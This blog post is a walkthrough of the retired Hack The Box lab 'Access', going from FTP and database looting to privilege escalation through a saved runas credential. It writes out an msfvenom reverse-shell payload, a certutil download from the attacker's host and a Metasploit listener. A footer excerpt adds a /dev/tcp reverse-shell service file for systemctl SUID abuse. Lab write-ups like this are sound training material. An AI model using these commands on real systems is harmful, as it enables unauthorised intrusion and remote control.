Skip to main content

Hackthebox.eu - Retired - Access







Recon

As always I start with a simple up/down nmap scan on all tcp ports to see what's live
# nmap -T4 -p- -oX /root/Desktop/HTB/Access/nmapb.xml 10.10.10.98

I then converted the output to HTML to make it pretty

# xsltproc /root/Desktop/HTB/Access/nmapb.xml -o /root/Desktop/HTB/Access/nmapb.html

Ports 21,23 and 80 are open let's do our next stage of our scan using the -A switch to finger the OS/Services

# nmap -T4 -A -p21,23,80 -oX /root/Desktop/HTB/Access/nmapf.xml 10.10.10.98

Then convert that output to HTML also


Alright so we have microsoft FTP running on port 21 with anonymous access.
Port 23 is telnet, and port 80 is IIS 7.5

Let's browse to 80 and see what we see


Looks like a webcam of a Data Center


Just a pretty simple page.

Let's see if drib can find anything else interesting here.

http://10.10.10.98/aspnet_client/ - Which is 403 for us right now

What about that FTP with anonymous access?


Two folders Backups and Engineer

Under Backups there is a DB I downloaded that to my computer

Set type to binary
Download the file

Under Engineer there is an Access Control.zip file, I downloaded that to my computer also


This turned out to be a password protected ZIP file







Exploit


Let's see what we might be able to find within these files.

I opened the mdb file using this online opener

Found this interesting Table


So we have some user/pass info here.

I tried to telnet  with all these combinations and wasn't able to get in.
I also tried to login to the FTP with these login…. No dice

But wait? What about that password protected Zip file we could earlier?


Waiting GIF

Let's try that engineer password since this file is the one we found under the engineer folder on the FTP


It worked! Now we have a PST file. A pst file is a file used to save emails in microsoft outlook… so we probably have a saved email here.

I didn't want to xfer this over to my windows box, so I searched around for opening a PST file in kali

I found this site

# readpst -S -o /root/Desktop/HTB/Access/ /root/Desktop/HTB/Access/AccessControl.pst

So this output the file to a folder called Access Control, in that folder is a text file named 2

Open it up and found an email with this in it.





Hi there,



The password for the "security" account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.



Regards,

John


Alright a new password to try, 

Alright now we have a foothold to the system

We got the user hash with this login

Ff1f*****************


Calm Down Schitts Creek GIF by CBC

User.txt is cool and all but what about system access to get that root.xt



Poking around we found a couple of interesting folders on this box
C:\ZKTeco>


This makes sense, the mdb file we found earlier looks like it was a db for a door access control system.


Under the public Desktop folder I found this lnk files ( shortcut to files )

type "ZKAccess3.5 Security System.lnk"



This looks like a shortcut to launch the door access control software…..
Do you see what I see?


Runas ACCESS\Administrator /savecred


/savecred means the password for administrator was saved the first time the program executed….

So we can use RUNAS to run any program we want as the Administrator account.

Orange Is The New Black Bad Idea GIF


Let's do it…


I used MSFVENOM to create badidea.exe
# msfvenom  -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f exe > badidea.exe


Started up SimpleHTTPServer in my payloads folder to serve the shell to the target box


Setup a listener


Use exploit/mulit/handler
Options - to check the options that are required
Set payload windows/meterpreter/reverse_tcp - to mach the payload I created earlier
Set lhost to my VPN IP 10.10.14.13

Run to start the listener

Now we need to get the payload on the target box


I know wget is not standard on windows box but I still try

I used Certutil to grab the file from my attacking machine
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/badidea.exe" badidea.exe

Here is the output from my simpleHTTPServer  giving the file


Now back to the target machine…

I first tried to run it without using the run as and got this message about group policy not allowing it


Tried it again with the run as
runas /user:Administrator /savecred "badidea.exe"


We got our shell


Even better we are Administrator so no we can get our last hash





Dropped down to shell and cd'd to the desktop folder and ran type against root.txt
6e15**************








Computer Job GIF by ABC Network




















Hackthebox.eu - Retired - Access
Labels:

Comments

Post a Comment

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more